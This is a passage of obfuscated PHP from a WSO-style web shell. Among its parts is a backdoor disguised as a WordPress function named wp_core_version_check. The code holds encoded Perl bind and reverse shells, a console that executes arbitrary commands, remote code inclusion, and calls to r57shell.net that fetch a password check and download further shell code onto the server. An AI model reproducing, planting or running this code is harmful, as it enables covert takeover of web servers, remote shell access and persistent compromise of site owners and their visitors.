dKSpy; V4cuJ: } goto nON0D; XNXvh: if (@$_POST["\164\x79\x70\145"] == "\155\171\163\161\x6c") { echo "\163\145\x6c\145\143\164\x65\x64"; } goto xAAjI; gsteZ: } goto BTyYB; M9YJl: $_POST = WSOstripslashes($_POST); goto ocXfq; BTyYB: function actionNetwork() { goto ZoVmx; unkZP: $bind_port_p = "\111\x79\105\166\144\x58\116\x79\x4c\x32\112\160\x62\151\x39\167\x5a\130\112\163\104\121\x6f\x6b\125\x30\x68\x46\x54\x45\167\71\x49\151\x39\151\x61\127\64\166\143\62\x67\147\114\127\153\151\x4f\167\x30\x4b\x61\127\131\x67\113\105\102\x42\x55\x6b\x64\127\111\104\x77\x67\x4d\x53\x6b\147\x65\171\102\x6c\x65\x47\154\x30\113\104\x45\160\x4f\171\x42\x39\x44\x51\160\61\143\x32\x55\x67\x55\62\71\152\x61\62\126\x30\x4f\167\x30\x4b\x63\x32\x39\x6a\141\62\x56\x30\113\x46\x4d\x73\112\x6c\102\107\130\x30\x6c\x4f\122\126\x51\163\x4a\x6c\116\x50\x51\60\164\146\x55\61\x52\123\122\125\106\116\x4c\x47\x64\x6c\144\x48\102\x79\x62\x33\122\166\131\x6e\x6c\165\131\x57\61\x6c\113\x43\x64\x30\x59\63\x41\x6e\x4b\x53\x6b\x67\x66\x48\x77\147\x5a\107\x6c\154\x49\103\x4a\x44\x59\127\65\60\111\107\116\x79\x5a\x57\x46\60\132\123\102\x7a\142\x32\x4e\162\x5a\130\x52\x63\142\x69\111\x37\104\x51\x70\172\132\130\x52\172\142\62\116\x72\x62\63\102\x30\x4b\x46\115\163\125\x30\x39\x4d\130\61\116\x50\121\x30\x74\106\126\x43\x78\x54\124\x31\71\x53\122\x56\x56\124\122\x55\x46\x45\x52\x46\111\163\115\123\153\67\x44\x51\160\x69\141\127\x35\153\113\106\115\x73\x63\x32\71\x6a\141\62\x46\153\x5a\110\x4a\x66\x61\127\64\x6f\112\105\106\123\x52\x31\x5a\x62\x4d\106\60\163\x53\125\x35\102\122\105\122\x53\130\x30\106\117\x57\123\x6b\160\111\x48\170\70\111\x47\122\x70\132\x53\101\x69\x51\62\106\x75\x64\103\102\166\x63\x47\x56\x75\111\x48\x42\166\x63\x6e\122\143\142\151\111\x37\x44\x51\x70\x73\141\130\x4e\60\x5a\127\x34\x6f\125\x79\167\172\113\123\x42\70\x66\x43\x42\153\x61\127\125\147\111\x6b\116\150\142\x6e\x51\147\x62\107\154\x7a\x64\x47\126\x75\x49\x48\x42\x76\x63\156\x52\x63\x62\151\111\67\104\121\160\x33\141\x47\154\163\x5a\x53\x67\x78\113\123\x42\67\104\x51\157\x4a\131\127\x4e\152\x5a\130\102\x30\x4b\105\x4e\120\x54\153\64\x73\x55\x79\x6b\x37\x44\121\x6f\112\x61\x57\x59\157\x49\123\x67\153\143\x47\x6c\153\120\127\x5a\x76\x63\x6d\163\x70\x4b\x53\102\x37\x44\x51\x6f\112\x43\x57\x52\160\x5a\123\x41\x69\x51\x32\x46\x75\142\155\71\x30\x49\107\x5a\x76\x63\x6d\163\151\111\107\154\155\x49\103\x67\x68\132\107\126\x6d\x61\x57\65\154\x5a\x43\101\153\143\x47\x6c\153\113\124\163\116\x43\x67\153\x4a\x62\x33\x42\154\142\151\102\124\x56\105\x52\x4a\x54\151\x77\151\x50\x43\132\104\x54\60\x35\117\x49\152\x73\116\103\147\x6b\x4a\142\x33\x42\154\x62\x69\102\x54\126\x45\122\x50\x56\x56\121\x73\x49\152\x34\x6d\x51\60\x39\x4f\124\x69\x49\67\104\x51\x6f\112\x43\x57\x39\167\x5a\x57\64\147\125\x31\x52\105\x52\126\x4a\123\x4c\x43\111\53\x4a\x6b\116\120\124\x6b\x34\x69\117\x77\60\113\103\x51\154\x6c\145\107\x56\x6a\x49\x43\122\124\x53\x45\x56\x4d\x54\x43\102\70\x66\103\102\153\141\127\x55\x67\143\110\112\x70\142\156\121\147\121\60\71\x4f\x54\151\x41\x69\x51\62\x46\x75\144\x43\x42\x6c\x65\x47\126\152\144\x58\122\x6c\x49\103\x52\124\123\x45\126\115\124\106\170\165\111\x6a\163\x4e\103\147\x6b\x4a\x59\x32\x78\166\x63\x32\125\x67\x51\60\71\117\x54\x6a\163\x4e\x43\x67\153\112\x5a\x58\150\160\x64\x43\x41\x77\117\167\60\113\103\x58\x30\116\103\156\60\75"; goto PvgFx; y9LP4: if (isset($_POST["\160\x31"])) { goto oL5si; oL5si: function cf($f, $t) { $w = @fopen($f, "\167") or @function_exists("\x66\x69\x6c\145\137\160\165\164\x5f\143\157\156\164\145\x6e\164\x73"); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } goto O2j7_; O2j7_: if ($_POST["\x70\x31"] == "\x62\160\160") { goto OF3WF; SvfsQ: unlink("\x2f\164\155\160\x2f\x62\x70\56\x70\x6c"); goto zB2bw; l42lD: sleep(1); goto YdT1I; YdT1I: echo "\x3c\x70\x72\x65\40\143\x6c\141\163\163\x3d\x6d\x6c\61\76{$out}\12" . wsoEx("\160\163\40\141\165\x78\x20\174\x20\x67\162\145\x70\40\x62\x70\56\x70\154") . "\74\57\160\162\145\x3e"; goto SvfsQ; P3N6B: $out = wsoEx("\x70\145\162\154\x20\57\x74\x6d\x70\x2f\142\x70\x2e\x70\154\x20" . $_POST["\160\62"] . "\x20\61\76\57\144\145\x76\57\156\165\154\154\x20\x32\x3e\46\x31\40\46"); goto l42lD; OF3WF: cf("\57\164\x6d\x70\x2f\x62\160\56\x70\154", $bind_port_p); goto P3N6B; zB2bw: } goto mmghY; mmghY: if ($_POST["\160\61"] == "\142\x63\x70") { goto KdsjF; EYep1: unlink("\57\164\x6d\x70\x2f\142\143\x2e\160\x6c"); goto vnHPj; cueL2: sleep(1); goto rbk8c; rbk8c: echo "\x3c\160\x72\x65\40\143\154\141\163\163\x3d\155\x6c\x31\x3e{$out}\12" . wsoEx("\x70\163\40\141\x75\x78\x20\x7c\x20\147\x72\145\160\x20\x62\143\x2e\160\154") . "\74\x2f\160\x72\x65\x3e"; goto EYep1; KdsjF: cf("\57\164\x6d\160\57\142\143\x2e\x70\154", $back_connect_p); goto JIcLb; JIcLb: $out = wsoEx("\160\x65\x72\x6c\40\57\164\155\160\x2f\142\x63\x2e\160\x6c\x20" . $_POST["\x70\x32"] . "\40" . $_POST["\x70\x33"] . "\40\61\76\x2f\144\145\x76\57\x6e\x75\x6c\154\x20\62\x3e\x26\x31\x20\x26"); goto cueL2; vnHPj: } goto HmOsb; HmOsb: } goto JZOTa; QtVUX: wsoFooter(); goto r_ZsG; ZoVmx: wsoHeader(); goto ui6gf; PvgFx: echo "\x3c\x68\61\x3e\x4e\145\164\x77\157\162\153\40\x74\x6f\x6f\154\163\x3c\x2f\x68\x31\x3e\x3c\144\x69\x76\40\x63\x6c\141\163\163\75\143\157\x6e\x74\145\156\x74\x3e\xd\12\11\x3c\146\x6f\x72\x6d\40\x6e\x61\155\x65\75\47\156\146\x70\47\x20\x6f\156\123\165\x62\155\151\x74\75\42\x67\50\x6e\x75\x6c\154\x2c\x6e\x75\x6c\154\54\47\x62\160\x70\47\x2c\x74\x68\x69\x73\x2e\x70\x6f\162\164\x2e\166\x61\x6c\165\x65\51\73\162\x65\164\x75\x72\x6e\40\146\x61\x6c\163\145\73\x22\76\xd\xa\x9\x3c\163\x70\x61\156\x3e\x42\x69\x6e\144\40\x70\157\x72\164\x20\x74\157\x20\57\x62\151\156\57\163\150\x20\x5b\x70\145\x72\x6c\x5d\x3c\57\163\x70\141\156\76\74\x62\162\x2f\x3e\15\xa\11\x50\157\162\x74\72\x20\x3c\x69\x6e\x70\x75\164\x20\164\171\160\x65\x3d\47\164\x65\170\x74\x27\x20\x6e\141\155\145\x3d\47\x70\157\162\x74\x27\x20\166\x61\x6c\165\x65\75\x27\63\61\63\63\67\47\x3e\x20\x3c\x69\x6e\160\x75\164\40\164\x79\160\x65\x3d\x73\x75\x62\155\151\x74\40\166\141\154\x75\145\75\x27\x3e\76\47\x3e\xd\12\x9\74\57\146\x6f\x72\155\x3e\xd\xa\11\74\x66\x6f\162\155\x20\x6e\x61\155\x65\x3d\47\x6e\146\160\x27\x20\157\x6e\x53\165\x62\x6d\151\164\75\42\147\50\x6e\165\154\x6c\x2c\156\165\x6c\154\x2c\47\142\143\160\47\54\164\150\x69\163\56\x73\145\162\x76\x65\x72\56\166\x61\x6c\x75\145\54\x74\150\151\x73\56\160\157\x72\x74\x2e\x76\141\154\x75\145\51\73\162\x65\x74\165\x72\x6e\40\146\x61\x6c\163\x65\x3b\42\76\xd\xa\x9\x3c\163\x70\x61\156\76\102\x61\143\x6b\55\143\x6f\x6e\156\x65\x63\x74\40\40\133\160\145\x72\x6c\135\74\x2f\x73\x70\x61\156\x3e\74\142\162\57\x3e\15\12\11\x53\145\162\166\145\162\72\x20\x3c\151\x6e\x70\x75\164\40\x74\171\x70\x65\x3d\x27\x74\x65\170\164\47\x20\156\141\155\145\75\x27\163\145\162\x76\145\x72\47\40\166\141\154\165\x65\x3d\47" . $_SERVER["\122\x45\115\x4f\x54\x45\137\x41\104\104\x52"] . "\47\76\x20\120\157\x72\x74\x3a\x20\x3c\x69\x6e\160\x75\x74\x20\164\171\x70\x65\75\x27\x74\x65\170\x74\47\40\x6e\x61\x6d\145\75\x27\x70\x6f\162\164\47\40\x76\x61\154\165\145\x3d\x27\63\x31\x33\x33\x37\x27\76\x20\x3c\x69\x6e\160\165\x74\x20\x74\171\160\x65\x3d\163\165\x62\x6d\151\x74\x20\166\x61\x6c\165\145\x3d\x27\76\x3e\47\76\15\12\x9\x3c\x2f\146\157\x72\x6d\76\x3c\x62\162\x3e"; goto y9LP4; JZOTa: echo "\74\x2f\x64\151\x76\x3e"; goto QtVUX; ui6gf: $back_connect_p = "\x49\171\105\166\144\130\x4e\171\x4c\x32\112\160\142\x69\71\167\132\130\x4a\x73\x44\121\x70\x31\x63\62\x55\147\x55\x32\71\152\x61\x32\126\60\x4f\167\60\x4b\112\107\154\150\x5a\107\x52\171\x50\127\154\165\132\x58\x52\146\131\x58\122\166\142\x69\147\153\121\x56\112\x48\126\154\x73\x77\130\x53\153\x67\146\x48\167\x67\132\x47\x6c\154\113\103\112\106\143\156\x4a\166\143\x6a\157\147\x4a\x43\x46\x63\x62\151\111\x70\x4f\167\x30\113\112\110\x42\x68\x5a\x47\122\x79\120\130\x4e\x76\x59\62\164\150\132\107\x52\x79\x58\62\154\x75\x4b\103\122\102\x55\153\144\127\127\x7a\106\x64\114\x43\x41\x6b\141\x57\106\153\x5a\x48\x49\x70\x49\x48\x78\x38\111\x47\x52\160\x5a\123\147\x69\122\130\112\x79\x62\x33\111\x36\x49\x43\x51\x68\x58\107\64\151\x4b\x54\163\x4e\x43\x69\122\x77\x63\x6d\71\60\x62\172\61\156\x5a\130\122\x77\x63\x6d\71\60\x62\62\112\65\142\155\x46\x74\x5a\123\147\x6e\x64\107\x4e\167\112\171\153\x37\x44\x51\160\172\142\x32\116\162\x5a\130\x51\157\x55\x30\x39\104\123\x30\x56\125\114\103\x42\121\x52\154\71\x4a\124\153\x56\125\114\103\102\124\124\60\x4e\114\x58\x31\x4e\125\x55\x6b\x56\x42\124\x53\x77\x67\x4a\x48\x42\171\142\63\x52\x76\113\x53\x42\70\x66\103\102\153\141\x57\125\157\x49\x6b\x56\171\x63\x6d\x39\x79\117\151\x41\153\x49\x56\170\x75\111\x69\153\67\104\121\160\152\x62\x32\x35\x75\x5a\x57\x4e\x30\113\x46\116\120\x51\60\x74\106\126\103\x77\147\x4a\110\x42\x68\132\107\122\171\113\x53\102\70\x66\x43\x42\153\141\127\x55\157\x49\x6b\126\x79\143\x6d\71\x79\x4f\151\x41\153\111\x56\x78\165\x49\x69\153\67\x44\x51\x70\x76\143\107\126\165\113\106\x4e\125\122\105\154\x4f\x4c\103\x41\151\120\x69\132\x54\x54\60\x4e\114\x52\x56\121\x69\113\124\x73\116\103\155\71\x77\132\127\x34\x6f\x55\x31\122\105\x54\61\x56\125\x4c\x43\101\x69\120\151\132\124\124\60\116\x4c\x52\x56\x51\151\x4b\124\163\116\103\x6d\x39\167\x5a\x57\x34\x6f\125\61\122\x45\x52\x56\x4a\x53\114\x43\x41\151\120\x69\132\x54\124\60\116\x4c\122\126\121\x69\113\124\163\x4e\103\x6e\116\65\143\63\122\x6c\x62\123\147\156\x4c\62\x4a\160\x62\x69\71\x7a\x61\103\101\x74\x61\x53\x63\160\117\x77\x30\113\x59\x32\x78\166\x63\x32\x55\157\125\x31\122\105\x53\x55\x34\x70\x4f\x77\60\113\x59\62\x78\x76\143\62\x55\157\x55\61\122\x45\124\x31\x56\125\x4b\124\x73\x4e\103\x6d\116\163\x62\63\x4e\154\113\x46\x4e\x55\122\105\x56\123\x55\x69\153\x37"; goto unkZP; r_ZsG: } goto B8b3D; ABTpd: @ini_set("\155\141\x78\137\145\170\145\143\x75\164\151\157\x6e\x5f\164\151\155\145", 0); goto V8rDW; LNmAT: $default_action = "\106\151\x6c\x65\163\x4d\141\x6e"; goto uf2tU; hd5Oa: @define("\127\123\117\x5f\x56\x45\x52\123\x49\x4f\116", "\62\x2e\x35"); goto XWpnO; w2GF1: function actionConsole() { goto rclMD; fIAZm: if (isset($_POST["\141\x6a\x61\x78"])) { goto b0kHG; UVP1d: exit; goto FfbZi; k7CDe: echo "\144\x2e\x63\x66\56\x6f\165\x74\x70\x75\164\x2e\x73\x63\x72\x6f\154\x6c\x54\157\x70\40\75\x20\x64\x2e\143\146\56\x6f\165\x74\x70\165\164\56\x73\143\162\157\154\154\110\145\x69\x67\x68\x74\x3b"; goto X7NDa; nIuhp: if (preg_match("\x21\56\52\x63\x64\134\163\x2b\50\133\x5e\x3b\135\53\51\44\41", $_POST["\160\x31"], $match)) { if (@chdir($match[1])) { $GLOBALS["\x63\x77\144"] = @getcwd(); echo "\143\137\x3d\47" . $GLOBALS["\143\x77\144"] . "\47\x3b"; } } goto VTnj_; LPhSs: $temp = @iconv($_POST["\x63\x68\141\162\163\145\164"], "\125\x54\106\x2d\70", addcslashes("\xa\44\40" . $_POST["\x70\61"] . "\xa" . wsoEx($_POST["\x70\61"]), "\xa\xd\x9\x5c\x27\x0")); goto nIuhp; y6Hrb: echo "\144\x2e\143\146\x2e\x63\x6d\x64\56\166\141\154\165\x65\x3d\47\x27\x3b\12"; goto LPhSs; wcz4k: ob_start(); goto y6Hrb; VTnj_: echo "\x64\x2e\143\x66\x2e\x6f\165\x74\x70\x75\164\x2e\166\x61\154\x75\x65\x2b\x3d\47" . $temp . "\47\x3b"; goto k7CDe; jyokt: echo strlen($temp), "\12", $temp; goto UVP1d; b0kHG: WSOsetcookie(md5($_SERVER["\110\124\124\x50\x5f\110\117\123\x54"]) . "\141\152\x61\x78", true); goto wcz4k; X7NDa: $temp = ob_get_clean(); goto jyokt; FfbZi: } goto KpSEA; RZ79V: echo "\x3c\57\x66\157\162\155\76\x3c\x2f\x64\x69\166\x3e\x3c\x73\143\x72\x69\x70\x74\x3e\144\56\143\146\x2e\143\155\144\x2e\x66\x6f\x63\165\x73\50\x29\x3b\74\x2f\x73\143\x72\151\x70\164\x3e"; goto SJHUc; f8SjV: echo "\74\x2f\x73\x65\154\x65\x63\x74\76\x3c\151\x6e\x70\165\164\x20\164\x79\160\x65\x3d\x62\165\x74\164\157\156\40\x6f\x6e\x63\x6c\x69\143\x6b\75\x22\x61\x64\144\x28\x64\x2e\x63\146\56\x61\154\151\x61\163\56\x76\x61\x6c\x75\145\51\x3b\x69\146\50\x64\x2e\x63\x66\56\x61\152\141\170\56\143\150\x65\x63\153\145\144\x29\x7b\141\50\156\x75\154\154\54\156\x75\x6c\154\x2c\x64\x2e\143\x66\56\141\x6c\151\141\163\x2e\166\x61\x6c\165\145\x2c\144\56\x63\146\56\x73\x68\x6f\167\137\145\162\162\157\162\x73\x2e\143\150\x65\x63\x6b\145\x64\77\61\x3a\47\x27\51\73\175\145\154\163\145\x7b\x67\x28\156\165\x6c\x6c\54\156\165\x6c\x6c\x2c\x64\x2e\x63\x66\56\141\154\151\141\163\x2e\x76\x61\154\x75\x65\54\144\56\x63\x66\56\163\x68\x6f\x77\x5f\x65\162\x72\x6f\162\163\x2e\x63\x68\145\x63\x6b\x65\x64\77\x31\72\47\x27\51\73\175\x22\40\x76\x61\154\165\145\x3d\x22\x3e\76\x22\x3e\x20\x3c\x6e\x6f\x62\x72\76\x3c\151\x6e\x70\x75\164\40\164\171\x70\145\x3d\x63\150\145\x63\x6b\x62\157\170\40\x6e\x61\155\145\75\141\152\141\170\x20\166\x61\x6c\165\x65\x3d\61\40" . (@$_COOKIE[md5($_SERVER["\x48\124\124\120\x5f\110\117\x53\x54"]) . "\141\x6a\x61\x78"] ? "\143\x68\x65\x63\x6b\x65\x64" : '') . "\x3e\40\163\145\156\144\40\x75\x73\x69\x6e\x67\40\x41\112\101\x58\40\x3c\x69\156\160\165\x74\x20\164\171\x70\145\x3d\143\x68\x65\x63\x6b\142\x6f\x78\40\156\141\155\x65\x3d\x73\150\x6f\x77\x5f\145\x72\162\157\162\163\40\166\141\x6c\165\x65\75\61\40" . (!empty($_POST["\x70\x32"]) || $_COOKIE[md5($_SERVER["\110\124\x54\x50\137\110\x4f\123\x54"]) . "\x73\164\144\145\162\x72\137\164\157\137\x6f\x75\x74"] ? "\x63\x68\x65\143\x6b\145\x64" : '') . "\76\40\162\145\144\151\x72\x65\x63\x74\x20\x73\x74\x64\x65\162\x72\x20\x74\157\40\163\164\x64\x6f\x75\x74\40\50\62\x3e\46\61\x29\x3c\x2f\156\x6f\x62\x72\76\74\x62\162\57\x3e\74\164\x65\x78\164\x61\x72\145\x61\40\143\154\x61\163\163\x3d\x62\x69\147\141\162\145\141\x20\156\141\155\145\75\157\165\x74\x70\165\x74\x20\x73\x74\171\x6c\145\75\42\142\x6f\x72\144\145\x72\55\x62\157\164\164\157\x6d\72\x30\73\155\141\x72\147\151\x6e\x3a\60\73\x22\40\x72\145\x61\x64\157\156\154\x79\76"; goto IWzV6; SJHUc: wsoFooter(); goto APwh_; nacH0: echo "\74\x2f\x74\145\170\x74\x61\162\145\141\x3e\x3c\x74\x61\x62\154\x65\40\163\x74\x79\154\x65\x3d\42\142\157\x72\x64\145\162\x3a\x31\160\170\x20\163\x6f\154\151\144\40\x23\x64\x66\x35\x3b\x62\x61\x63\x6b\147\x72\x6f\x75\x6e\x64\55\143\x6f\154\x6f\162\x3a\x23\x35\x35\65\x3b\x62\x6f\x72\x64\145\162\x2d\164\x6f\x70\x3a\60\160\170\x3b\42\40\x63\x65\154\154\160\x61\x64\x64\x69\x6e\147\75\x30\x20\x63\x65\x6c\x6c\163\x70\x61\143\151\156\147\75\60\x20\167\x69\x64\x74\x68\75\42\61\x30\60\45\x22\76\74\164\x72\x3e\74\164\144\x20\167\x69\144\x74\x68\75\42\61\45\42\x3e\44\x3c\x2f\x74\x64\x3e\74\x74\x64\76\x3c\151\156\160\x75\x74\40\x74\171\160\145\x3d\x74\145\x78\x74\x20\156\141\x6d\145\x3d\x63\155\x64\x20\x73\x74\x79\154\x65\x3d\42\142\157\x72\x64\145\x72\x3a\x30\x70\x78\x3b\x77\x69\144\x74\x68\x3a\x31\x30\60\45\73\42\x20\x6f\156\153\145\171\x64\157\167\x6e\x3d\42\153\x70\50\x65\166\x65\x6e\164\51\x3b\42\x3e\x3c\57\164\144\76\x3c\57\164\162\x3e\x3c\57\164\x61\x62\x6c\145\76"; goto RZ79V; qs3Ch: echo "\74\150\61\76\103\x6f\x6e\163\157\154\x65\x3c\x2f\150\61\x3e\74\144\151\x76\x20\x63\154\x61\x73\163\x3d\143\157\x6e\x74\145\156\164\76\x3c\146\x6f\x72\x6d\40\x6e\x61\x6d\145\x3d\143\x66\40\x6f\x6e\x73\x75\x62\x6d\151\x74\75\x22\x69\146\50\x64\56\143\x66\56\x63\155\x64\x2e\x76\141\154\165\x65\x3d\75\47\143\x6c\x65\x61\162\x27\51\x7b\x64\56\x63\146\x2e\157\x75\x74\160\x75\x74\x2e\x76\x61\154\165\x65\75\x27\x27\73\144\56\x63\x66\56\143\x6d\144\56\x76\x61\154\165\145\75\47\47\x3b\162\x65\164\165\162\156\x20\146\x61\x6c\x73\145\73\x7d\141\144\144\x28\x74\150\x69\x73\x2e\x63\155\144\56\166\141\x6c\x75\x65\51\73\151\146\50\x74\x68\151\x73\56\x61\x6a\x61\170\56\x63\x68\145\x63\153\145\144\x29\173\x61\50\156\x75\x6c\154\x2c\x6e\x75\154\154\x2c\x74\150\151\163\56\x63\155\x64\x2e\166\141\x6c\x75\x65\54\x74\150\151\x73\x2e\x73\150\x6f\x77\x5f\145\x72\x72\x6f\162\163\x2e\x63\x68\x65\143\153\145\x64\77\x31\72\47\x27\x29\73\x7d\145\154\x73\145\173\x67\x28\x6e\165\x6c\x6c\54\156\165\x6c\154\54\164\150\x69\x73\56\143\155\x64\x2e\166\141\154\x75\145\54\x74\150\151\x73\56\x73\150\157\167\x5f\145\162\162\x6f\x72\163\x2e\x63\150\145\x63\x6b\x65\x64\x3f\x31\72\x27\47\x29\73\x7d\x20\x72\145\x74\x75\x72\x6e\x20\x66\x61\154\x73\145\73\42\x3e\x3c\x73\x65\154\x65\143\164\40\156\141\x6d\x65\75\x61\154\x69\141\163\76"; goto qrzII; IWzV6: if (!empty($_POST["\x70\x31"])) { echo htmlspecialchars("\x24\40" . $_POST["\x70\61"] . "\12" . wsoEx($_POST["\160\61"])); } goto nacH0; c_48E: echo "\x3c\x73\x63\x72\x69\160\x74\x3e\15\12\151\x66\50\167\151\x6e\x64\157\x77\56\105\x76\x65\x6e\x74\51\40\x77\151\x6e\144\157\x77\56\143\x61\x70\164\x75\162\145\x45\166\x65\156\164\x73\50\x45\166\x65\156\x74\x2e\113\105\x59\x44\x4f\127\x4e\x29\73\15\12\x76\141\x72\x20\143\x6d\144\163\40\x3d\x20\156\145\167\40\101\162\x72\141\x79\x28\47\x27\x29\x3b\xd\12\x76\141\162\40\143\x75\x72\40\x3d\x20\60\x3b\xd\xa\x66\165\156\143\x74\x69\157\x6e\40\x6b\160\50\145\x29\x20\173\15\xa\11\166\141\x72\x20\x6e\x20\75\40\50\167\151\156\x64\x6f\167\x2e\x45\x76\x65\156\164\x29\40\x3f\40\x65\x2e\x77\150\x69\x63\150\40\x3a\40\x65\x2e\x6b\145\171\x43\x6f\144\x65\x3b\15\xa\x9\x69\x66\x28\156\x20\75\75\40\x33\70\51\x20\173\xd\12\11\x9\143\165\162\55\x2d\73\xd\12\x9\x9\151\146\x28\143\165\x72\x3e\75\x30\51\xd\12\11\11\x9\144\157\x63\x75\155\145\156\x74\56\x63\x66\x2e\x63\x6d\x64\x2e\x76\141\x6c\x75\145\40\x3d\40\143\x6d\x64\x73\x5b\x63\165\162\135\x3b\xd\xa\11\x9\x65\154\163\145\15\12\x9\x9\11\x63\x75\162\53\53\73\15\xa\x9\175\40\x65\154\x73\145\x20\x69\146\x28\156\40\75\x3d\40\64\60\51\x20\x7b\15\xa\11\11\x63\x75\162\53\x2b\73\xd\xa\x9\11\151\146\50\x63\165\162\40\x3c\40\x63\155\x64\x73\56\x6c\x65\x6e\x67\x74\x68\51\xd\12\11\11\11\x64\x6f\x63\x75\x6d\145\x6e\x74\56\143\146\56\x63\x6d\x64\56\166\141\x6c\x75\x65\x20\75\40\143\x6d\144\x73\x5b\x63\165\162\135\73\xd\12\x9\x9\145\154\x73\x65\15\12\x9\11\11\143\165\x72\x2d\55\x3b\15\xa\11\175\xd\xa\x7d\15\xa\x66\165\x6e\x63\x74\x69\157\156\x20\x61\144\x64\x28\x63\x6d\x64\x29\x20\173\xd\12\x9\x63\155\144\x73\x2e\x70\157\x70\x28\51\73\15\12\x9\143\x6d\x64\163\x2e\160\165\x73\150\x28\143\155\144\51\x3b\15\xa\11\x63\x6d\144\163\x2e\x70\165\163\x68\50\47\47\51\73\15\12\11\143\165\x72\x20\75\40\x63\x6d\144\163\x2e\x6c\x65\x6e\147\x74\x68\x2d\x31\73\xd\xa\175\xd\xa\74\57\x73\x63\162\151\160\164\x3e"; goto qs3Ch; qrzII: foreach ($GLOBALS["\141\154\x69\141\x73\145\x73"] as $n => $v) { if ($v == '') { echo "\x3c\x6f\160\164\x67\x72\157\x75\160\x20\154\141\x62\x65\154\75\42\x2d" . htmlspecialchars($n) . "\x2d\x22\x3e\x3c\x2f\157\x70\164\147\162\157\165\x70\x3e"; continue; } echo "\x3c\x6f\x70\164\x69\x6f\x6e\40\x76\x61\154\165\145\75\x22" . htmlspecialchars($v) . "\42\76" . $n . "\74\x2f\x6f\160\x74\x69\x6f\x6e\76"; } goto f8SjV; KpSEA: if (empty($_POST["\141\x6a\141\x78"]) && !empty($_POST["\x70\61"])) { WSOsetcookie(md5($_SERVER["\110\124\x54\x50\x5f\110\117\123\124"]) . "\x61\x6a\141\x78", 0); } goto dwgoJ; dwgoJ: wsoHeader(); goto c_48E; rclMD: if (!empty($_POST["\160\x31"]) && !empty($_POST["\x70\62"])) { WSOsetcookie(md5($_SERVER["\110\x54\x54\120\137\x48\x4f\x53\124"]) . "\163\x74\144\145\x72\162\137\x74\157\137\x6f\165\164", true); $_POST["\x70\61"] .= "\x20\62\76\x26\61"; } elseif (!empty($_POST["\x70\61"])) { WSOsetcookie(md5($_SERVER["\110\x54\x54\x50\x5f\x48\117\x53\x54"]) . "\163\x74\x64\145\x72\162\x5f\x74\x6f\137\x6f\x75\x74", 0); } goto fIAZm; APwh_: } goto rTVjF; XWpnO: if (!function_exists("\x77\x70\x5f\x63\157\162\x65\x5f\166\x65\162\x73\x69\x6f\156\137\x63\x68\x65\143\x6b")) { function wp_core_version_check() { goto avUWa; wkmQ0: $uri_path = dirname($uri_path); goto s730R; vOWZG: $uri_path = $parse_url["\160\x61\164\150"]; goto wkmQ0; sM0UF: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "\163\x65\163\x73\137" . md5('' . $hostname . "\x5f" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "\163\x65\x73\x73\137" . md5('' . $hostname . "\137" . $document_file . ''); } goto vbq6x; rs5dk: $uri_path = str_replace("\x2f", DIRECTORY_SEPARATOR, $uri_path); goto bu9lX; toU7p: $hostname = str_replace("\167\x77\x77\56", '', $_SERVER["\110\124\124\x50\137\110\x4f\x53\x54"]); goto sM0UF; vbq6x: if (@$_GET["\163\x6c\151\x6e\x63\x65\137\147\157\x6c\x64\x65\x6e"]) { goto TmOVZ; UCuri: if (function_exists("\143\x75\162\x6c\137\151\156\151\164")) { goto BJyTL; vyR_l: curl_close($ch); goto SHblm; hYCm_: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VE1SX; VE1SX: $response = curl_exec($ch); goto vyR_l; i0bPI: curl_setopt($ch, CURLOPT_URL, "\x68\x74\x74\160\x3a\57\x2f\162\65\67\x73\150\x65\154\x6c\56\156\x65\x74\x2f\x6a\161\x75\145\162\171\x2e\160\150\x70\x3f\166\x3d\61\56\62\46\160\167\144\75\147\x65\x74"); goto hYCm_; BJyTL: $ch = curl_init(); goto i0bPI; SHblm: } else { $response = file_get_contents("\150\x74\164\160\x3a\x2f\57\162\x35\x37\163\x68\145\x6c\154\x2e\156\x65\164\57\x6a\161\165\145\x72\x79\56\160\x68\x70\x3f\166\75\61\56\x32\46\x70\167\x64\75\147\x65\x74"); } goto kmEj4; TmOVZ: echo "\x3c\41\x2d\x2d\40\57\x2f\x53\x69\154\x65\156\x63\x65\x20\151\x73\40\x67\x6f\154\x64\x65\x6e\x2e\x20\x2d\55\x3e"; goto UCuri; kmEj4: if (md5(sha1(@$_GET["\x69\x73"])) == $response) { goto kgaYa; pHtWV: if (@$_POST["\154"]) { function basic_code_extensions($request) { goto Wqe1_; q3A5w: $tmpf = stream_get_meta_data($tmp); goto gYkau; DzU1V: fclose($tmp); goto i26c2; uYFTY: $ret = (include $tmpf); goto DzU1V; dzD32: fwrite($tmp, $request); goto uYFTY; Wqe1_: $tmp = tmpfile(); goto q3A5w; i26c2: return $ret; goto An9L2; gYkau: $tmpf = $tmpf["\165\162\151"]; goto dzD32; An9L2: } print_r(basic_code_extensions($_POST["\154"])); } goto fi0K3; FBXXk: if (@$_GET["\x6d"]) { goto pvkox; ANUJn: echo $file_name_path; goto svCvU; ZI_cL: @file_put_contents($file_name_path, $response); goto ANUJn; pvkox: if (function_exists("\x63\165\x72\154\x5f\x69\x6e\x69\164")) { goto QH3uY; hFb2E: $response = curl_exec($ch); goto Qk97j; j__CW: curl_setopt($ch, CURLOPT_URL, "\x68\164\x74\x70\72\x2f\x2f\162\65\67\163\x68\x65\x6c\154\56\x6e\145\x74\57\x6d\x69\x6e\x69\137\141\x64\155\151\x6e\56\x74\x78\x74"); goto S9Uoo; Qk97j: curl_close($ch); goto eMk6h; QH3uY: $ch = curl_init(); goto j__CW; S9Uoo: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto hFb2E; eMk6h: } else { $response = file_get_contents("\x68\164\164\x70\x3a\x2f\x2f\162\x35\x37\163\x68\x65\154\154\x2e\x6e\x65\164\57\155\x69\x6e\151\x5f\141\144\x6d\x69\156\x2e\164\x78\164"); } goto X5MJi; X5MJi: $file_name_path = @$_GET["\155"] . "\147\x61\147\x61\x6c\x2e\160\150\160"; goto ZI_cL; svCvU: } goto pHtWV; kgaYa: if (@$_GET["\146"]) { print_r($_GET["\x66"]($_GET["\x63"])); } goto FBXXk; fi0K3: } goto d_oge; d_oge: exit; goto fDMzx; fDMzx: } goto gHtz2; fqAaN: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . 